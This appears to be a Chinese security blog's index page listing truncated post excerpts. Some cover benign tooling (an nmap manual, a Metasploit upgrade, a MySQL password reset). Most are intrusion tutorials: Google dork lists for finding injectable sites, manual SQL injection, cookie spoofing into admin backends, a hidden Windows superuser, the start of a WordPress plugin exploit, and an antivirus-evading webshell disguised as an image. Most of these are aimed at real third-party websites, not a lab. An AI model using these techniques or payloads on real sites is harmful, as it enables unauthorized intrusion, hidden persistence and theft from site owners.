原创 我的友情鏈接

51CTO博客開發

原创 BackTrack5 升級Metasploit至Git更新的方法

由於Kali在虛擬機的運行效率實在讓人不敢恭維,於是決心將BT5中的MSF進行升級,升級的主要目的是,BT5R3內置的MSF是用SVN進行更新,但是新版本的MSF已經停止通過SVN更新,改用Git,必須重新安裝。網上找了很多辦法,看見帖子裏

原创 nmap中文使用手冊

1.名稱nmap-網絡探測和安全掃描工具2.語法nmap [Scan Type(s)] [Options]3.描述  nmap是一個網絡探測和安全掃描程序,系統管理者和個人可以使用這個軟件掃描大型 的網絡,獲取那臺主機正在運行以及提供什麼服

原创 XP建立隱藏的超級用戶

regedit是大家最熟悉的東西了吧。nt/2000/xp的帳戶信息都在註冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統用戶SYSTEM外,其它用戶都無權查看到裏面的信息,因此我首先用註冊表對SAM鍵爲我設置爲

原创 Appscan批量掃描網站

最近,項目中用到appscan比較多,但是發現appscan只能一個個的掃,一般掃描又在晚上進行,一直在找方法看看有沒有辦法,也在網上發帖問過相關問題,本文引自“http://bbs.51cto.com/thread-1095506-1.h

原创 BackTrack5 升級Metasploit至Git更新的方法

由於Kali在虛擬機的運行效率實在讓人不敢恭維,於是決心將BT5中的MSF進行升級,升級的主要目的是,BT5R3內置的MSF是用SVN進行更新,但是新版本的MSF已經停止通過SVN更新,改用Git,必須重新安裝。網上找了很多辦法,看見帖子裏

原创 手工注入方法

手工注入方法:在谷歌裏輸入關鍵字:inurl:encomphonorbig.asp?id=手工注入教程:1、www.google.com.hk搜索:inurl:encomphonorbig.asp?id=2、判斷注入點:and 1=1  

原创 我的友情鏈接

51CTO博客開發

原创 BT5利用sqlmap對漏洞靶機掃描

1、通過sqlmap進行注入***:root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/

原创 網站注入大全關鍵字

inurl:asp?id=inurl:Article_Print.asp?EnCompHonorBig.asp?id=隨便加個數字showproduct.asp?id=隨便加個數字inurl:ManageLogin.aspEnCompHon

原创 COOKIES欺騙通殺漏洞進後臺

在谷歌裏搜索:inurl:news_more.asp?lm2=搜索到如下站點:http://www.*********/news_more.asp?lm2=1691.將“/news_more.asp?lm2=169”替換成“/admin/a

原创 BT5下利用WordpressZingiri Plugin***靶機鏡像wordpress

Wordpress Zingiri Plugin的***代碼如下:<?phperror_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);$fileman

原创 本地mysql忘記密碼的解決辦法

首先停止mysql C:\Program Files\MySQL\bin>net stop mysqlMySQL 服務正在停止.MySQL 服務已成功停止。然後使用mysql bin目錄的mysqld-nt.exe 執行命令 mysqld-

原创 注入拿站關鍵字

注入拿站關鍵字整理(超全)關鍵字:Power WenDay Ver1.0添加: /db/PW_SYS_Data.mdb關鍵字:powered by WEBBOY添加: /upfile.asp 關鍵字:Powered By :SMT Vers

原创 (新方法)圖片一句話***(免殺)

大家都知道有的上傳程序會重新繪圖來驗證圖片的合法性,如果不能繪圖則視爲非法文件,所以我們用CMD的copy命令中的/b參數來把馬和圖合併成一個文件(copy /b  1.jpg+2.asp 3.jpg)今天教你一招不用CMD命令一秒鐘製作傳